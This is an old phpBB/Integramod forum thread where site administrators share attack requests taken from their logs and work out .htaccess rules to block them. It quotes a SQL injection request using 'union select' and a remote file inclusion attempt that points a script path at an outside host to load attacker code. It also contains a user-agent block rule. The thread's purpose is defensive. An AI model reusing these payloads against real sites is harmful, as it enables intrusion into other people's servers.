Sub Menu
Links Menu
Online Users

In total there are 315 users online :: 3 registered, 0 hidden and 312 guests

Most users ever online was 1091 on Wed Aug 16, 2023 5:27 pm

Registered users: Bing [Bot], Google [Bot], Majestic-12 [Bot] based on users active over the past 60 minutes

Security Logs with Hacker IP's

This is where youll find security related information.
Discuss Integramod/phpbb security issues here.

Moderator: Integra Moderator

Re: Security Logs with Hacker IP's

PostAuthor: CaNNon » Sat Aug 18, 2007 6:25 pm

We still get lots of attacks, but it generates a nice log in the error_log for tracking/reporting purposes...


using rewrite, it kills the tool that is hitting me in about 85% of the attacks. This makes the log smaller so if you try it, set it up to process the rewrite first then the url's it could help speed things up a bit (this file is processed on every request I believe) and make a little less work with the logs for you.

Just a thought.
Last edited by CaNNon on Wed Dec 31, 1969 4:00 pm, edited 1 time in total.
Image
Image
User avatar
CaNNon
Sr Integra Member
Sr Integra Member
 
Posts: 750
Likes: 0 post
Liked in: 0 post
Joined: Thu Apr 19, 2007 11:15 am
Cash on hand: 0.00

Re: Security Logs with Hacker IP's

PostAuthor: Omni-Lee » Wed Nov 28, 2007 8:46 pm

Checking the log file I found this little number:

Code: Select all
/forum/links.php?t=search&search_keywords=asd&start=1,1+and+1=2+union+select+0x2D4578372D31,0x2D4578372D32,0x2D4578372D33,0x2D4578372D34,0x2D4578372D35,0x2D4578372D36,0x2D4578372D37,0x2D4578372D38,0x2D4578372D39,0x2D4578372D3130,0x2D4578372D3131,0x2D4578372D3132,0x2D4578372D3133,0x2D4578372D3134,0x2D4578372D3135,0x2D4578372D3136,0x2D4578372D3137,0x2D4578372D3138,0x2D4578372D3139,0x2D4578372D3230,0x2D4578372D3231,0x2D4578372D3232,0x2D4578372D3233,0x2D4578372D3234,0x2D4578372D3235,0x2D4578372D3236,0x2D4578372D3237,0x2D4578372D3238,0x2D4578372D3239,0x2D4578372D3330,0x2D4578372D3331,0x2D4578372D3332,0x2D4578372D3333,0x2D4578372D3334,0x2D4578372D3335,0x2D4578372D3336,0x2D4578372D3337,0x2D4578372D3338,0x2D4578372D3339,0x2D4578372D3430,0x2D4578372D3431,0x2D4578372D3432,0x2D4578372D3433,0x2D4578372D3434,0x2D4578372D3435,0x2D4578372D3436,0x2D4578372D3437,0x2D4578372D3438,0x2D4578372D3439,0x2D4578372D3530/*


What the heck is it?

Btw, what is that Rewrite in .htaccess? Can it be used for attacks like what I posted above?
Last edited by Omni-Lee on Wed Dec 31, 1969 4:00 pm, edited 1 time in total.
"Out, out, brief candle! Life's but a walking shadow, a poor player that struts and frets his hour upon the stage and then is heard no more: it is a tale told by an idiot, full of sound and fury, signifying nothing" - Macbeth ACT V, Scene V by William Shakespeare
User avatar
Omni-Lee
Members
Members
 
Posts: 69
Likes: 0 post
Liked in: 0 post
Joined: Wed Jan 31, 2007 11:07 pm
Cash on hand: 0.00

Re: Security Logs with Hacker IP's

PostAuthor: CaNNon » Thu Nov 29, 2007 7:07 am

post the full attack like this:

forum/viewforum.php?f=4&mark=topics&lofi=1//includes/functions_portal.php?phpbb_root_path=http://terroristirc.by.ru/rootlab.jpg?
libwww-perl/5.79 61.19.188.2 15 Jul 2007 11:04 pm

and If i have a .htaccess rule I'll post it, the attack type is in that url "union+select".
Last edited by CaNNon on Wed Dec 31, 1969 4:00 pm, edited 1 time in total.
Image
Image
User avatar
CaNNon
Sr Integra Member
Sr Integra Member
 
Posts: 750
Likes: 0 post
Liked in: 0 post
Joined: Thu Apr 19, 2007 11:15 am
Cash on hand: 0.00

Re: Security Logs with Hacker IP's

PostAuthor: Omni-Lee » Thu Nov 29, 2007 10:29 am

I tried the RewriteCond code you supplied and I get 403 Access Denied. It was a direct copy and paste.

*Edit*: I found the problem, the [OR] can only be used when there is going to be another command (possibly of a similar type).

Code: Select all
 RewriteEngine On# testing user agent blockingRewriteCond %{HTTP_USER_AGENT} libwww-perl [OR]RewriteCond %{HTTP_USER_AGENT} ai_archiver# end testRewriteRule ^.* - [F,L]
Last edited by Omni-Lee on Wed Dec 31, 1969 4:00 pm, edited 1 time in total.
"Out, out, brief candle! Life's but a walking shadow, a poor player that struts and frets his hour upon the stage and then is heard no more: it is a tale told by an idiot, full of sound and fury, signifying nothing" - Macbeth ACT V, Scene V by William Shakespeare
User avatar
Omni-Lee
Members
Members
 
Posts: 69
Likes: 0 post
Liked in: 0 post
Joined: Wed Jan 31, 2007 11:07 pm
Cash on hand: 0.00

Re: Security Logs with Hacker IP's

PostAuthor: CaNNon » Thu Nov 29, 2007 11:53 am

Thats correct, did you check to see if that block will stop that?
Last edited by CaNNon on Wed Dec 31, 1969 4:00 pm, edited 1 time in total.
Image
Image
User avatar
CaNNon
Sr Integra Member
Sr Integra Member
 
Posts: 750
Likes: 0 post
Liked in: 0 post
Joined: Thu Apr 19, 2007 11:15 am
Cash on hand: 0.00

Re: Security Logs with Hacker IP's

PostAuthor: Omni-Lee » Thu Nov 29, 2007 2:35 pm

I've been watching and the logs have been clean. Whats totally nuts is I actually want to see an entry now, just so I can block it. Thanks for that bit of code. With the error, inadvertent as it was, I researched .htaccess commands and found ways to further secure my site. Specifically hiding the .htaccess file from external requests. I never knew all the good things that could be done in .htaccess, it is a pretty powerful file.
Last edited by Omni-Lee on Wed Dec 31, 1969 4:00 pm, edited 1 time in total.
"Out, out, brief candle! Life's but a walking shadow, a poor player that struts and frets his hour upon the stage and then is heard no more: it is a tale told by an idiot, full of sound and fury, signifying nothing" - Macbeth ACT V, Scene V by William Shakespeare
User avatar
Omni-Lee
Members
Members
 
Posts: 69
Likes: 0 post
Liked in: 0 post
Joined: Wed Jan 31, 2007 11:07 pm
Cash on hand: 0.00

Previous

Return to Forum Security

Who is online

Registered users: Bing [Bot], Google [Bot], Majestic-12 [Bot]

cron